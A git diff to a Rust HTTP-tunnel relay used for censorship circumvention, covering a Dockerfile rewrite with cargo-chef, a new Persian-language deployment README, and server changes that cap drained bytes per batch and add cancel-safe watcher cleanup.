+            seq += 1;
+        }
+
+        // Now check that a subsequent op carries the buffered upload data.
+        let mut found_upload = false;
+        for _ in 0..4 {
+            let msg = match tokio::time::timeout(Duration::from_secs(2), rx.recv()).await {
+                Ok(Some(m)) => m,
+                _ => break,
+            };
+            if let MuxMsg::Data { data, reply, .. } = msg {
+                if &data[..] == b"UPLOAD_DATA" {
+                    found_upload = true;
+                }
+                let _ = reply.send(Ok((
+                    TunnelResponse {
+                        sid: Some("sid-overlap".into()),
+                        d: None, pkts: None,
+                        eof: Some(found_upload),
+                        e: None, code: None, seq: Some(seq),
+                    },
+                    "test-script".to_string(),
+                )));
+                seq += 1;
+                if found_upload { break; }
+            }
+        }
+        assert!(found_upload, "upload data must appear in a subsequent op");
+
+        // Drain any remaining in-flight ops (stagger sleep is 1 s,
+        // so allow enough time for late-arriving ops).
+        while let Ok(Some(msg)) = tokio::time::timeout(Duration::from_millis(1500), rx.recv()).await {
+            if let MuxMsg::Data { reply, .. } = msg {
+                let _ = reply.send(Ok((
+                    TunnelResponse {
+                        sid: Some("sid-overlap".into()),
+                        d: None, pkts: None, eof: Some(true),
+                        e: None, code: None, seq: Some(seq),
+                    },
+                    "test-script".to_string(),
+                )));
+                seq += 1;
+            }
+        }
+
+        let _ = tokio::time::timeout(Duration::from_secs(4), loop_handle)
+            .await
+            .expect("tunnel_loop did not exit after eof");
+    }
 }
diff --git a/tunnel-node/Dockerfile b/tunnel-node/Dockerfile
index a31f31e8..c5329dd5 100644
--- a/tunnel-node/Dockerfile
+++ b/tunnel-node/Dockerfile
@@ -1,12 +1,14 @@
-# syntax=docker/dockerfile:1
-#
 # Multi-stage build for the mhrv-tunnel-node service.
 #
-# Build stage compiles a release binary against rust 1.85 (matches MSRV in
-# Cargo.toml). Cargo's incremental build cache is mounted via BuildKit
-# `--mount=type=cache` so a `docker build` against an unchanged dependency
-# tree skips re-downloading + re-compiling crates — first build ~6 min,
-# warm builds ~30 s.
+# Build stage compiles a release binary on a recent stable Rust.
+# Dependency caching is done via `cargo-chef`: a separate layer cooks
+# just the dependencies first, so warm rebuilds where only `src/`
+# changes reuse that layer and skip recompiling crates.
+#
+# This intentionally avoids BuildKit `--mount=type=cache` directives so
+# the Dockerfile builds on classic Docker daemons too — notably Cloud
+# Run's `gcloud run deploy --source .` builder, which does not enable
+# BuildKit (see issue #620).
 #
 # Runtime stage is `debian:bookworm-slim` for libc compatibility (the
 # binary dynamically links against glibc) plus `ca-certificates` so HTTPS
@@ -27,31 +29,28 @@
 # `--health-cmd 'curl -fsS http://localhost:8080/ || exit 1'` on the
 # `docker run` if you want compose-level health gating.
 
-FROM rust:1.85-slim AS builder
+FROM rust:1.90-slim AS chef
+RUN cargo install cargo-chef --locked --version 0.1.77
 WORKDIR /app
-# Copy lockfile so cargo uses pinned versions identically to local builds.
+
+FROM chef AS planner
+COPY Cargo.toml Cargo.lock ./
+COPY src/ ./src/
+RUN cargo chef prepare --recipe-path recipe.json
+
+FROM chef AS builder
+COPY --from=planner /app/recipe.json recipe.json
+RUN cargo chef cook --release --recipe-path recipe.json
 COPY Cargo.toml Cargo.lock ./
 COPY src/ ./src/
-# BuildKit cache mounts: cargo's registry/git caches and the target/
-# directory persist across builds, dramatically speeding up rebuilds when
-# only application code changes.
-RUN --mount=type=cache,target=/usr/local/cargo/registry \
-    --mount=type=cache,target=/usr/local/cargo/git \
-    --mount=type=cache,target=/app/target \
-    cargo build --release --bin tunnel-node && \
+RUN cargo build --release --bin tunnel-node && \
     cp /app/target/release/tunnel-node /usr/local/bin/tunnel-node
 
 FROM debian:bookworm-slim
-# `ca-certificates` for HTTPS upstream targets; nothing else needed at
-# runtime since the binary is statically linked against musl-equivalents
-# only for the parts that don't touch glibc.
 RUN apt-get update \
     && apt-get install -y --no-install-recommends ca-certificates \
     && rm -rf /var/lib/apt/lists/*
 
-# Non-root runtime user. The service does no filesystem writes outside
-# /tmp, so a static-uid unprivileged user is sufficient and prevents
-# accidental host-FS writes if the container is volume-mounted.
 RUN useradd --system --uid 1000 --no-create-home --shell /usr/sbin/nologin tunnel
 
 COPY --from=builder /usr/local/bin/tunnel-node /usr/local/bin/tunnel-node
diff --git a/tunnel-node/README.fa.md b/tunnel-node/README.fa.md
new file mode 100644
index 00000000..007f7174
--- /dev/null
+++ b/tunnel-node/README.fa.md
@@ -0,0 +1,188 @@
+# Tunnel Node — راهنمای فارسی
+
+> *English: [README.md](./README.md)*
+
+سرور پل HTTP-tunnel برای حالت `full` در MasterHttpRelayVPN. درخواست‌های HTTP-tunnel رو که از Apps Script می‌رسن، به اتصال‌های واقعی TCP/UDP تبدیل می‌کنه.
+
+این `tunnel-node` همون قطعه‌ای از مسیر Full mode هست که روی **VPS شما** اجرا می‌شه. جواب کوتاه به سؤال «آیا VPS لازمه؟» = **بله، برای حالت Full بدون VPS کار نمی‌کنه**.
+
+## معماری
+
+```
+موبایل/PC → mhrv-rs → [TLS با domain-fronting روی Google] → Apps Script → [HTTP] → Tunnel Node (روی VPS شما) → [TCP/UDP واقعی] → اینترنت
+```
+
+Tunnel-node session‌های پایدار TCP و UDP رو نگه می‌داره. session‌های TCP اتصال‌های واقعی به سرور مقصد هستن؛ session‌های UDP، socketهای connected-UDP به یک `host:port` مقصد هستن. data از طریق پروتکل JSON جریان داره:
+
+- **connect** — باز کردن TCP به `host:port` + برگرداندن session ID
+- **data** — نوشتن data کلاینت + خوندن جواب سرور
+- **udp_open** — باز کردن UDP به `host:port`، اختیاری اولین datagram رو همزمان می‌فرسته
+- **udp_data** — یک datagram UDP می‌فرسته، یا اگه `d` ست نشه برای datagram‌های برگشتی poll می‌کنه
+- **close** — تخریب session
+- **batch** — پردازش چند op در یک request HTTP (تعداد روند-تریپ کمتر)
+
+## استقرار
+
+### Cloud Run (پیشنهاد برای کاربران ایرانی متأثر از فیلتر #313)
+
+اجرای tunnel-node روی **Google Cloud Run** یعنی destination IP خود Google هست — احتمال filter شدن مسیر Apps Script → tunnel-node توسط ISP ایران بسیار پایین‌تر از Hetzner/DigitalOcean. ([کانتکست در #313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313))
+
+```bash
+cd tunnel-node
+gcloud run deploy tunnel-node \
+  --source . \
+  --region us-central1 \
+  --allow-unauthenticated \
+  --set-env-vars TUNNEL_AUTH_KEY=$(openssl rand -hex 24) \
+  --memory 256Mi \
+  --cpu 1 \
+  --max-instances 1
+```
+
+### Docker — image آماده (هر VPS)
+
+سریع‌ترین مسیر. image آماده pull کن و اجرا کن؛ نیاز به Rust toolchain روی VPS نیست.
+
+```bash
+# secret قوی بساز. ذخیره‌اش کن — همین مقدار رو بعداً تو CodeFull.gs paste می‌کنی.
+SECRET=$(openssl rand -hex 24)
+echo "TUNNEL_AUTH_KEY شما: $SECRET"
+
+# Pull + run.
+docker run -d \
+  --name mhrv-tunnel \
+  --restart unless-stopped \
+  -p 8080:8080 \
+  -e TUNNEL_AUTH_KEY="$SECRET" \
+  ghcr.io/therealaleph/mhrv-tunnel-node:latest
+```
+
+تگ `:latest` آخرین release رو دنبال می‌کنه. برای production توصیه می‌شه روی version مشخص pin بزنی: `ghcr.io/therealaleph/mhrv-tunnel-node:v1.8.0` (یا هر نسخه‌ای که داری). image روی `linux/amd64` و `linux/arm64` موجوده.
+
+**docker-compose.yml** اگه این رو ترجیح می‌دی:
+
+```yaml
+services:
+  tunnel:
+    image: ghcr.io/therealaleph/mhrv-tunnel-node:latest
+    restart: unless-stopped
+    ports:
+      - "8080:8080"
+    environment:
+      TUNNEL_AUTH_KEY: ${TUNNEL_AUTH_KEY}
+```
+
+سپس `TUNNEL_AUTH_KEY=your-secret docker compose up -d`.
+
+### Docker — build از source
+
+اگه می‌خوای خودت image رو build کنی (یا custom تغییر بدی):
+
+```bash
+cd tunnel-node
+docker build -t tunnel-node .
+docker run -p 8080:8080 -e TUNNEL_AUTH_KEY=your-secret tunnel-node
+```
+
+### Binary مستقیم
+
+```bash
+cd tunnel-node
+cargo build --release
+TUNNEL_AUTH_KEY=your-secret PORT=8080 ./target/release/tunnel-node
+```
+
+## متغیرهای محیطی
+
+| متغیر | الزامی | پیش‌فرض | توضیح |
+|-------|--------|---------|-------|
+| `TUNNEL_AUTH_KEY` | بله | `changeme` | secret مشترک — باید با `TUNNEL_AUTH_KEY` در CodeFull.gs match کنه |
+| `PORT` | خیر | `8080` | پورت listen (Cloud Run خودش این رو ست می‌کنه) |
+| `MHRV_DIAGNOSTIC` | خیر | (off) | اگه `1` باشه، روی auth بد به‌جای decoy 404 nginx، JSON `{"e":"unauthorized"}` صریح برمی‌گردونه. **فقط برای setup/debug** — قبل از public کردن tunnel-node خاموشش کن. (v1.8.0+) |
+
+## پروتکل
+
+### تک op: `POST /tunnel`
+
+```json
+{"k":"auth","op":"connect","host":"example.com","port":443}
+{"k":"auth","op":"data","sid":"uuid","data":"base64"}
+{"k":"auth","op":"close","sid":"uuid"}
+```
+
+### Batch: `POST /tunnel/batch`
+
+```json
+{
+  "k": "auth",
+  "ops": [
+    {"op":"data","sid":"uuid1","d":"base64"},
+    {"op":"udp_data","sid":"uuid2","d":"base64"},
+    {"op":"close","sid":"uuid3"}
+  ]
+}
+→ {"r": [{...}, {...}, {...}]}
+```
+
+### Health check: `GET /health` → `ok`
+
+## Performance: تعداد deployment و عمق pipeline
+
+کلاینت mhrv-rs در حالت Full یک batch-multiplexer pipelined اجرا می‌کنه. هر روند-تریپ Apps Script حدود ۲ ثانیه طول می‌کشه، پس کلاینت چندین request batch همزمان شلیک می‌کنه — عمق pipeline برابر تعداد deployment ID‌های Apps Script هست (حداقل ۲، بدون سقف بالا).
+
+تعداد deployment بیشتر = batchهای همزمان بیشتر روی tunnel-node = latency پایین‌تر برای session. با ۶ deployment، هر ۰.۳ ثانیه یه batch جدید می‌رسه (به‌جای هر ۲ ثانیه).
+
+خود tunnel-node per-request stateless هست (session‌ها بر اساس UUID key می‌شن)، پس batchهای همزمان رو طبیعی handle می‌کنه. برای بهترین نتیجه، ۳–۱۲ Apps Script روی account‌های Google جداگانه deploy کن و همهٔ deployment ID‌ها رو در config کلاینت لیست کن.
+
+---
+
+## سؤالات رایج
+
+### حجم مصرف چقدره؟
+
+سه لایه overhead هست در حالت Full:
+
+1. **Base64 encoding** برای data ها در JSON envelope = ~۳۳٪ overhead روی payload (4 byte per 3 byte raw)
+2. **JSON envelope + headers** = ~۵-۱۵٪ overhead بسته به اندازه payload
+3. **Random padding (v1.8.0+)** برای DPI defense = متوسط ۵۱۲ بایت اضافه به هر batch
+
+تخمین کلی: اگه ۱ GB دانلود می‌کنی، ~۱.۲۵-۱.۳ GB روی پهنای باند VPS مصرف می‌کنه.
+
+برای ۲۰ GB ماهانه استفاده روزمره (browsing + Telegram + ویدیو متوسط)، ~۲۵-۲۷ GB پهنای باند VPS لازم داری. Hetzner CX11 (€۴/ماه) ۲۰ TB ماهانه می‌ده — یعنی به سقف نمی‌رسی مگه streaming سنگین.
+
+### روی موبایل کل برنامه‌ها رو بالا میاره؟
+
+**بستگی به Mode داره:**
+
+- **mhrv-rs Android در Tunnel mode (Operating Mode → Tunnel)** + Full + tunnel-node = ✅ کل ترافیک Android (شامل YouTube، Telegram MTProto، Instagram، Snapchat، هر چیزی) capture می‌شه. این از VpnService استفاده می‌کنه.
+- **mhrv-rs Android در Proxy mode** + Full + tunnel-node = فقط app‌هایی که proxy رو صریحاً respect می‌کنن (Chrome، Firefox، برخی app‌های Telegram-فارسی). YouTube/Insta/Telegram اصلی proxy رو نادیده می‌گیرن + از mhrv-rs رد نمی‌شن.
+
+برای اینکه «همهٔ app‌ها بیان» = حتماً **Tunnel mode** فعال کن.
+
+### سرعت چقدر خوبه؟
+
+برای یک flow (یک download، یک ویدیو، یک TCP connection) معمولاً **۵۰–۲۰۰ KB/s** هست. علت:
+
+- Apps Script روند-تریپ floor ~۲۰۰-۵۰۰ ms داره (غیر قابل پایین آوردن، Google-side limit)
+- هر batch به یک deployment باند می‌شه + هر flow به یک batch
+- در نتیجه per-flow throughput = batch_size / batch_round_trip = (~۶۴-۲۵۶ KB) / (~۲۵۰-۵۰۰ ms) ≈ ۱۲۸-۱۰۲۴ KB/s ceiling
+
+برای **چند flow همزمان** (browsing با چند تب، Telegram + YouTube همزمان)، throughput جمعی به sum از همه flow‌ها مقیاس می‌خوره — با ۶ deployment روی ۶ Google account می‌تونی ۶ flow همزمان داشته باشی.
+
+**توصیه واقع‌بینانه:** برای browsing عادی + chat + ویدیو متوسط = کافیه. برای دانلود فایل‌های بزرگ سریع، **Wireguard مستقیم روی همان VPS** ابزار درست‌تره (۵-۱۰x سریع‌تر، چون Apps Script رو دور می‌زنه). mhrv-rs ارزش اصلیش لایه «دور زدن censorship با domain-fronting» هست، نه سرعت raw — وقتی به اون لایه نیاز نداری (مسیر مستقیم به VPS باز هست)، ابزار ساده‌تر بهتره.
+
+### آیا VPS لازمه؟
+
+برای **حالت Full** (شامل Telegram، YouTube بدون 60s SABR cliff، WebSockets، MTProto و هر چیزی غیر-HTTPS-ساده): **بله، VPS الزامی هست**.
+
+برای **حالت `apps_script`** (browsing فقط HTTPS): **خیر، نیاز به VPS نیست** — فقط نیاز به Apps Script setup روی Google account داری.
+
+برای **حالت `direct`** (Google services مثل Search/Gmail/YouTube، به علاوهٔ هر `fronting_groups` که تنظیم کرده باشید): **نه VPS لازمه نه Apps Script** — فقط تونل بازنویسی `SNI`. (نام قبلی این حالت `google_only` بود.)
+
+### چه VPS‌ای پیشنهاد می‌شه؟
+
+- **Hetzner CX11** (Falkenstein/Helsinki، €۴/ماه) — best value، ۲۰ TB ماهانه، خوب برای کاربران اروپا/خاورمیانه
+- **DigitalOcean basic droplet** ($۶/ماه، NYC/SFO) — برای کاربران آمریکا
+- **Google Cloud Run** (free tier تا ۲ میلیون request/ماه + ۵ GB egress) — تنها provider که destination IP اصلاً Google هست، پس مسیر Iran→Apps Script→Cloud-Run-tunnel-node کاملاً درون شبکه Google می‌مونه و ISP filter نمی‌بینه. **بهترین گزینه برای کاربران ایرانی متأثر از [#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313)**.
+
+برای راهنمای قدم‌به‌قدم setup: [#310 reply (راهنمای فارسی)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310#issuecomment-4326086988).
diff --git a/tunnel-node/README.md b/tunnel-node/README.md
index 88d884ba..529c15e3 100644
--- a/tunnel-node/README.md
+++ b/tunnel-node/README.md
@@ -1,5 +1,7 @@
 # Tunnel Node
 
+> *Persian / فارسی: [README.fa.md](./README.fa.md)*
+
 HTTP tunnel bridge server for MasterHttpRelayVPN "full" mode. Bridges HTTP tunnel requests (from Apps Script) to real TCP connections.
 
 ## Architecture
diff --git a/tunnel-node/src/main.rs b/tunnel-node/src/main.rs
index e03ff5e8..33809086 100644
--- a/tunnel-node/src/main.rs
+++ b/tunnel-node/src/main.rs
@@ -22,12 +22,14 @@ use axum::{routing::post, Json, Router};
 use base64::engine::general_purpose::STANDARD as B64;
 use base64::Engine;
 use serde::{Deserialize, Serialize};
-use tokio::io::{AsyncReadExt, AsyncWriteExt};
-use tokio::net::tcp::{OwnedReadHalf, OwnedWriteHalf};
+use tokio::io::{AsyncRead, AsyncReadExt, AsyncWriteExt};
+use tokio::net::tcp::OwnedWriteHalf;
 use tokio::net::{lookup_host, TcpStream, UdpSocket};
 use tokio::sync::{mpsc, Mutex, Notify};
 use tokio::task::JoinSet;
 
+mod udpgw;
+
 /// Structured error code returned when the tunnel-node receives an op it
 /// doesn't recognize. Clients use this (rather than string-matching `e`) to
 /// detect a version mismatch and gracefully fall back.
@@ -40,16 +42,13 @@ const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP";
 /// milliseconds — once any session in the batch fires its notify.
 const ACTIVE_DRAIN_DEADLINE: Duration = Duration::from_millis(350);
 
-/// After the first session in an active batch wakes the wait, we sleep
-/// briefly so neighboring sessions whose responses land just after the
-/// first one don't get reported empty and pay an extra round-trip. Only
-/// applies to active batches — for long-poll batches the wake event IS
-/// the data we want, so we deliver it immediately.
-///
-/// 30 ms is much shorter than the legacy two-pass retry (150 + 200 ms)
-/// but covers the typical case of co-located upstreams whose RTTs
-/// cluster within a few tens of ms of each other.
-const STRAGGLER_SETTLE: Duration = Duration::from_millis(30);
+/// Adaptive straggler settle: after the first session in an active batch
+/// wakes the drain, keep checking in STEP increments whether new data is
+/// still arriving. Stops when no new data arrived in the last STEP (the
+/// burst is over) or MAX is reached. Packing more session responses into
+/// one batch saves quota on high-latency relays (~1.5s Apps Script overhead).
+const STRAGGLER_SETTLE_STEP: Duration = Duration::from_millis(10);
+const STRAGGLER_SETTLE_MAX: Duration = Duration::from_millis(1000);
 
 /// Drain-phase deadline when the batch is a pure poll (no writes, no new
 /// connections — clients just asking "any push data?"). Holding the
@@ -63,18 +62,16 @@ const STRAGGLER_SETTLE: Duration = Duration::from_millis(30);
 /// op per session), so any local bytes that arrive while the poll is
 /// being held are stuck in the kernel until the poll returns.
 ///
-///   * Lower (e.g. 2 s) — interactive shells / typing-burst flows feel
-///     snappier, but push-only sessions pay more empty round-trips.
-///   * Higher (e.g. 20 s) — push delivery is near-RTT and round-trip
-///     count is minimal, but a thinking pause between keystrokes can
-///     tax the next keystroke by up to the chosen value.
-///
-/// 5 s is a middle ground: a typing user pausing mid-thought pays at
-/// most a 5 s nudge before their next keystroke flows, while idle
-/// sessions still get the bulk of the long-poll benefit. Must also
-/// stay safely below the client's `BATCH_TIMEOUT` (30 s) and Apps
-/// Script's UrlFetch ceiling (~60 s).
-const LONGPOLL_DEADLINE: Duration = Duration::from_secs(5);
+/// 15 s keeps persistent connections (Telegram XMPP on :5222, Google
+/// Push on :5228) alive without forcing frequent reconnects. At 5 s,
+/// apps like Telegram interpreted the frequent empty returns as
+/// connection instability and rotated sessions — each reconnect costs
+/// a full TLS handshake (~4 s through Apps Script), causing visible
+/// video/voice interruptions. 15 s is well below the client's
+/// `BATCH_TIMEOUT` (30 s) and Apps Script's UrlFetch ceiling (~60 s).
+/// Tested on censored networks in Iran where users reported smoother
+/// Telegram video playback and fewer session resets at this value.
+const LONGPOLL_DEADLINE: Duration = Duration::from_secs(15);
 
 /// Bound on each UDP session's inbound queue. Beyond this we drop oldest
 /// to keep recent voice/media packets moving — a stale RTP frame is
@@ -86,6 +83,35 @@ const UDP_QUEUE_LIMIT: usize = 256;
 /// a maximum-size IPv4 datagram without truncation.
 const UDP_RECV_BUF_BYTES: usize = 65536;
 
+/// Maximum raw bytes per TCP drain that we hand back to Apps Script in
+/// one batch response. Apps Script's hard cap on Web App response body
+/// is ~50 MiB. Accounting for base64 encoding (1.33×) and JSON envelope
+/// overhead, the safe ceiling for raw bytes is roughly 32 MiB — but
+/// `serde_json::to_vec` for a single 32-MiB string is also a CPU spike,
+/// so we lean further back at 16 MiB. On a high-bandwidth VPS (1 Gbps+)
+/// the reader task can stuff the per-session buffer with tens of MiB
+/// between polls (issue #460); without this cap, `drain_now` would take
+/// the lot, the response would exceed Apps Script's ceiling, the body
+/// would be truncated mid-base64, and the client would fail JSON parse
+/// with `EOF while parsing a string at line 1 column ~52428685`. By
+/// returning at most this many bytes per drain and leaving the rest in
+/// the read buffer for the next poll, we keep responses comfortably
+/// under the cap and let throughput recover across batches.
+const TCP_DRAIN_MAX_BYTES: usize = 16 * 1024 * 1024;
+
+/// Hard cap on the total raw bytes drained across **all sessions** in a
+/// single batch response. The per-session cap (`TCP_DRAIN_MAX_BYTES`)
+/// alone isn't enough — N concurrent sessions can each contribute up to
+/// 16 MiB raw; with N≥4, the summed batch body exceeds Apps Script's
+/// 50 MiB ceiling and the client fails JSON parse mid-stream (#863).
+///
+/// 32 MiB raw → ~43 MiB base64 + per-session JSON envelope overhead
+/// (~80 bytes × ≤50 ops cap) → comfortably under 50 MiB total. Any
+/// further sessions in the same batch are deferred to the next poll
+/// (their data stays in their per-session `read_buf`, so no data loss
+/// — they just settle one batch later).
+const BATCH_RESPONSE_BUDGET: usize = 32 * 1024 * 1024;
+
 /// First queue-drop on a session always logs at warn level; subsequent
 /// drops log at debug only every Nth occurrence so a single congested
 /// session can't flood the operator's log.
@@ -95,8 +121,30 @@ const UDP_QUEUE_DROP_LOG_STRIDE: u64 = 100;
 // Session
 // ---------------------------------------------------------------------------
 
+/// Writer half — either a real TCP socket or an in-process duplex channel
+/// (used for virtual sessions like udpgw).
+enum SessionWriter {
+    Tcp(OwnedWriteHalf),
+    Duplex(tokio::io::WriteHalf<tokio::io::DuplexStream>),
+}
+
+impl SessionWriter {
+    async fn write_all(&mut self, buf: &[u8]) -> std::io::Result<()> {
+        match self {
+            SessionWriter::Tcp(w) => w.write_all(buf).await,
+            SessionWriter::Duplex(w) => w.write_all(buf).await,
+        }
+    }
+    async fn flush(&mut self) -> std::io::Result<()> {
+        match self {
+            SessionWriter::Tcp(w) => w.flush().await,
+            SessionWriter::Duplex(w) => w.flush().await,
+        }
+    }
+}
+
 struct SessionInner {
-    writer: Mutex<OwnedWriteHalf>,
+    writer: Mutex<SessionWriter>,
     read_buf: Mutex<Vec<u8>>,
     eof: AtomicBool,
     last_active: Mutex<Instant>,
@@ -105,11 +153,27 @@ struct SessionInner {
     /// to wake the drain phase as soon as any session has something to
     /// ship, replacing the old fixed-sleep heuristic.
     notify: Notify,
+    /// Sequence-ordered write buffer: pipelined data ops may arrive
+    /// out of order (different batches completing at different times).
+    /// We buffer out-of-order writes and flush in seq order.
+    next_write_seq: Mutex<Option<u64>>,
+    pending_writes: Mutex<std::collections::BTreeMap<u64, Vec<u8>>>,
 }
 
 struct ManagedSession {
     inner: Arc<SessionInner>,
     reader_handle: tokio::task::JoinHandle<()>,
+    /// For udpgw sessions, the server task handle (so we can abort on close).
+    udpgw_handle: Option<tokio::task::JoinHandle<()>>,
+}
+
+impl ManagedSession {
+    fn abort_all(&self) {
+        self.reader_handle.abort();
+        if let Some(ref h) = self.udpgw_handle {
+            h.abort();
+        }
+    }
 }
 
 /// UDP equivalent of `SessionInner`. Holds a *connected* `UdpSocket`
@@ -148,21 +212,45 @@ async fn create_session(host: &str, port: u16) -> std::io::Result<ManagedSession
     let (reader, writer) = stream.into_split();
 
     let inner = Arc::new(SessionInner {
-        writer: Mutex::new(writer),
+        writer: Mutex::new(SessionWriter::Tcp(writer)),
         read_buf: Mutex::new(Vec::with_capacity(32768)),
         eof: AtomicBool::new(false),
         last_active: Mutex::new(Instant::now()),
         notify: Notify::new(),
+        next_write_seq: Mutex::new(None),
+        pending_writes: Mutex::new(std::collections::BTreeMap::new()),
     });
 
     let inner_ref = inner.clone();
     let reader_handle = tokio::spawn(reader_task(reader, inner_ref));
 
-    Ok(ManagedSession { inner, reader_handle })
+    Ok(ManagedSession { inner, reader_handle, udpgw_handle: None })
+}
+
+/// Create a virtual udpgw session backed by an in-process duplex channel.
+fn create_udpgw_session() -> ManagedSession {
+    let (client_half, server_half) = tokio::io::duplex(65536);
+    let (read_half, write_half) = tokio::io::split(client_half);
+
+    let inner = Arc::new(SessionInner {
+        writer: Mutex::new(SessionWriter::Duplex(write_half)),
+        read_buf: Mutex::new(Vec::with_capacity(32768)),
+        eof: AtomicBool::new(false),
+        last_active: Mutex::new(Instant::now()),
+        notify: Notify::new(),
+        next_write_seq: Mutex::new(None),
+        pending_writes: Mutex::new(std::collections::BTreeMap::new()),
+    });
+
+    let inner_ref = inner.clone();
+    let reader_handle = tokio::spawn(reader_task(read_half, inner_ref));
+    let udpgw_handle = Some(tokio::spawn(udpgw::udpgw_server_task(server_half)));
+
+    ManagedSession { inner, reader_handle, udpgw_handle }
 }
 
-async fn reader_task(mut reader: OwnedReadHalf, session: Arc<SessionInner>) {
-    let mut buf = vec![0u8; 65536];
+async fn reader_task(mut reader: impl AsyncRead + Unpin, session: Arc<SessionInner>) {
+    let mut buf = vec![0u8; 2 * 1024 * 1024];
     loop {
         match reader.read(&mut buf).await {
             Ok(0) => {
@@ -274,13 +362,38 @@ async fn udp_reader_task(socket: Arc<UdpSocket>, session: Arc<UdpSessionInner>)
     }
 }
 
-/// Drain whatever is currently buffered — no waiting.
-/// Used by batch mode where we poll frequently.
-async fn drain_now(session: &SessionInner) -> (Vec<u8>, bool) {
+/// Drain up to `min(TCP_DRAIN_MAX_BYTES, max_bytes)` from the per-session
+/// read buffer — no waiting. Used by batch mode where we poll frequently.
+///
+/// `max_bytes` is the caller-supplied budget for this drain (typically the
+/// remaining batch-response budget after summing previous drains in the
+/// same batch). It allows the batch loop to stop one session short of
+/// blowing past Apps Script's 50 MiB ceiling on the wire (#863). Pass
+/// `usize::MAX` if there's no extra budget constraint (e.g. single-op
+/// path outside the batch loop).
+///
+/// If the buffer is larger than the effective cap, we return a prefix of
+/// the data and leave the remainder in the buffer for the next poll.
+///
+/// `eof` is reported as true only when the buffer has been fully drained
+/// AND upstream has signaled EOF — otherwise a partial drain would
+/// prematurely tear the session down on the client side.
+async fn drain_now(session: &SessionInner, max_bytes: usize) -> (Vec<u8>, bool) {
     let mut buf = session.read_buf.lock().await;
-    let data = std::mem::take(&mut *buf);
-    let eof = session.eof.load(Ordering::Acquire);
-    (data, eof)
+    let raw_eof = session.eof.load(Ordering::Acquire);
+    let cap = max_bytes.min(TCP_DRAIN_MAX_BYTES);
+    if buf.len() <= cap {
+        let data = std::mem::take(&mut *buf);
+        (data, raw_eof)
+    } else {
+        // Take the prefix; leave the tail in the buffer.
+        let tail = buf.split_off(cap);
+        let head = std::mem::replace(&mut *buf, tail);
+        // Don't propagate eof yet — buffer still has data even if upstream
+        // has closed. The client will get eof on the later drain whose
+        // remaining data fits within the cap and empties the buffer.
+        (head, false)
+    }
 }
 
 /// Block until *any* of `inners` has buffered data, hits EOF, or the
@@ -307,6 +420,27 @@ async fn drain_now(session: &SessionInner) -> (Vec<u8>, bool) {
 ///     wait for a real notify. Without this filter, an idle long-poll
 ///     batch could return in <1 ms on a stale permit and degrade push
 ///     delivery to the client's idle re-poll cadence.
+/// `JoinHandle` newtype that aborts the task on `Drop`. Lets the waiter
+/// helpers below be cancel-safe under `tokio::select!`: a plain
+/// `Vec<JoinHandle<()>>` only releases its handles via `Drop`, which
+/// *detaches* tasks rather than aborting them. The previous shape
+/// relied on a trailing `for w in &watchers { w.abort(); }` loop. That
+/// was fine when the function ran to completion, but the loop sat after
+/// the cancellation points (`is_any_drainable().await`, the inner
+/// `select!`), so cancelling the loser arm of the phase-2 `select!`
+/// left N orphan watchers parked on `notify.notified()`. Each held an
+/// `Arc<…Inner>` and could steal a `notify_one()` permit from a
+/// future batch's watcher, making that batch wait until the next
+/// notify or its deadline. Wrapping in `AbortOnDrop` makes cleanup
+/// happen on every exit path, including cancellation.
+struct AbortOnDrop(tokio::task::JoinHandle<()>);
+
+impl Drop for AbortOnDrop {
+    fn drop(&mut self) {
+        self.0.abort();
+    }
+}
+
 async fn wait_for_any_drainable(inners: &[Arc<SessionInner>], deadline: Duration) {
     if inners.is_empty() {
         return;
@@ -314,15 +448,15 @@ async fn wait_for_any_drainable(inners: &[Arc<SessionInner>], deadline: Duration
 
     // One watcher per session. Each loops until it observes real state
     // (eof set or buffer non-empty) before signaling — see the
-    // race-safety note on `wait_for_any_drainable` for why. We abort the
-    // watchers on return; the only state they hold is a notify
-    // subscription, so abort is clean.
+    // race-safety note above. Watchers are held in a Vec of
+    // `AbortOnDrop`, so they're aborted on every exit path —
+    // including cancellation by an outer `select!`.
     let (tx, mut rx) = mpsc::channel::<()>(1);
-    let mut watchers = Vec::with_capacity(inners.len());
+    let mut _watchers: Vec<AbortOnDrop> = Vec::with_capacity(inners.len());
     for inner in inners {
         let inner = inner.clone();
         let tx = tx.clone();
-        watchers.push(tokio::spawn(async move {
+        _watchers.push(AbortOnDrop(tokio::spawn(async move {
             loop {
                 inner.notify.notified().await;
                 if inner.eof.load(Ordering::Acquire) {
@@ -337,7 +471,7 @@ async fn wait_for_any_drainable(inners: &[Arc<SessionInner>], deadline: Duration
                 // notify, don't wake the caller.
             }
             let _ = tx.try_send(());
-        }));
+        })));
     }
     drop(tx);
 
@@ -355,9 +489,9 @@ async fn wait_for_any_drainable(inners: &[Arc<SessionInner>], deadline: Duration
         }
     }
 
-    for w in &watchers {
-        w.abort();
-    }
+    // No explicit abort loop: `_watchers`'s `AbortOnDrop` entries fire
+    // on the function returning here AND on the future being dropped
+    // mid-await by an outer `select!`.
 }
 
 /// True iff any session is currently drainable: its read buffer has
@@ -395,12 +529,14 @@ async fn wait_for_any_udp_drainable(inners: &[Arc<UdpSessionInner>], deadline: D
         return;
     }
 
+    // See `AbortOnDrop` and the comment on `wait_for_any_drainable`
+    // for why watchers must be aborted on every exit path.
     let (tx, mut rx) = mpsc::channel::<()>(1);
-    let mut watchers = Vec::with_capacity(inners.len());
+    let mut _watchers: Vec<AbortOnDrop> = Vec::with_capacity(inners.len());
     for inner in inners {
         let inner = inner.clone();
         let tx = tx.clone();
-        watchers.push(tokio::spawn(async move {
+        _watchers.push(AbortOnDrop(tokio::spawn(async move {
             loop {
                 inner.notify.notified().await;
                 if inner.eof.load(Ordering::Acquire) {
@@ -413,7 +549,7 @@ async fn wait_for_any_udp_drainable(inners: &[Arc<UdpSessionInner>], deadline: D
                 // prior batch. Loop back, don't wake the caller.
             }
             let _ = tx.try_send(());
-        }));
+        })));
     }
     drop(tx);
 
@@ -424,10 +560,6 @@ async fn wait_for_any_udp_drainable(inners: &[Arc<UdpSessionInner>], deadline: D
             _ = tokio::time::sleep(deadline) => {}
         }
     }
-
-    for w in &watchers {
-        w.abort();
-    }
 }
 
 async fn is_any_udp_drainable(inners: &[Arc<UdpSessionInner>]) -> bool {
